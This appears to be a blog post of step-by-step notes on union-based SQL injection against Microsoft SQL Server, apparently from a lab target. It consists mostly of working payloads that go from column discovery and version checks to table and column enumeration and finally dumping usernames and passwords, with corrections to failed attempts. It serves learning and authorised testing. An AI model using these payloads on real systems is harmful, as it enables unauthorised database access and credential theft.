MSSQL database: hands-on union-based SQL injection notes (use only against systems you are authorised to test)

发布时间 2023-10-03 23:15:33作者: lisenMiller

Step 1: find which columns are echoed back in the page (the union must have the same column count as the original query)

1' union select 1,2,3,4,5,6;-- -

Columns 2 and 3 are echoed in the response; all data must be placed in those positions.

Step 2: detect the MSSQL version (@@version is a server variable, no FROM clause needed)

1' union select 1,@@version,3,4,5,6;-- - 

Step 3: confirm the current database

1' union select 1,db_name(),3,4,5,6;-- - ## reported as an error in this test
--
In T-SQL db_name() is a scalar function and does not require a FROM clause, so the payload above is syntactically valid; if it fails, suspect something else (a type-conversion error in the echoed column, or the application mangling the quote) rather than the missing FROM. The author worked around it by wrapping the call in a subquery and selecting from the system catalog. Note the correct catalog name is master..sysdatabases (not systemdatabases); this returns the same db_name() value once per database row (UNION then de-duplicates it).
1' union select 1,(select db_name()),3,4,5,6 from master..sysdatabases;-- - ## worked

Step 4: enumerate the user tables in the current database (streamio, as returned by db_name())

1' union select 1,name,id,4,5,6 from streamio..sysobjects where xtype='U';-- -
--
Tip: the table list lives in the sysobjects view of the target database (dbname..sysobjects), not in master..sysdatabases, which only lists databases. User-created tables have xtype='U', so filter on it to hide system objects. Write down both the name and the id of the table you want — the id is used in the next step. On modern SQL Server versions sys.tables / sys.columns or INFORMATION_SCHEMA.TABLES are the supported equivalents of these legacy compatibility views.

Step 5: enumerate the columns of a table from its name or id

1'union selct 1,col_name(object_id('users'),2,3,4,5,6 from systemobject;-- - X ## error
--
This attempt fails for several reasons, not just the missing database prefix:
a. the catalog view is sysobjects (here streamio..sysobjects), and it should be qualified with the target database name;
b. col_name() takes two arguments, col_name(object_id('users'), <column_number>), so a column index must be supplied;
c. the union must have exactly 6 values to match step 1 — this line has 7 (1, col_name(...), 2, 3, 4, 5, 6);
d. "selct" is a typo for select.
--
1' union select 1,col_name(object_id('users'),colid),3,4,5,6 from streamio..syscolumns where id=object_id('users');-- -
--
Selecting from streamio..syscolumns yields one row per column of the users table, and passing colid as the second argument of col_name() resolves each column name; this avoids hand-copying object ids. (The original note used "from streamio..sysobjects where id in (885578193,9051578250)" purely to produce multiple rows; note that an object id is a 32-bit int, so a value such as 9051578250 cannot be one — if you go that route, take the ids exactly as step 4 returned them.)

Step 6: extract the data stored in the columns (both values are packed into echoed column 2 with a separator)

1' union select 1,concat(username,0x7e,password),3,4,5,6 from users;-- -   ## 0x7e is a binary literal in T-SQL; CONCAT implicitly converts it to '~'
1' union select 1,concat(username,':',password),3,4,5,6 from users;-- -    ## clearer: use a plain string separator
-- CONCAT requires SQL Server 2012 or later; on older versions use username+'~'+password (CAST non-string columns to varchar first, otherwise '+' fails or does arithmetic).

End of steps.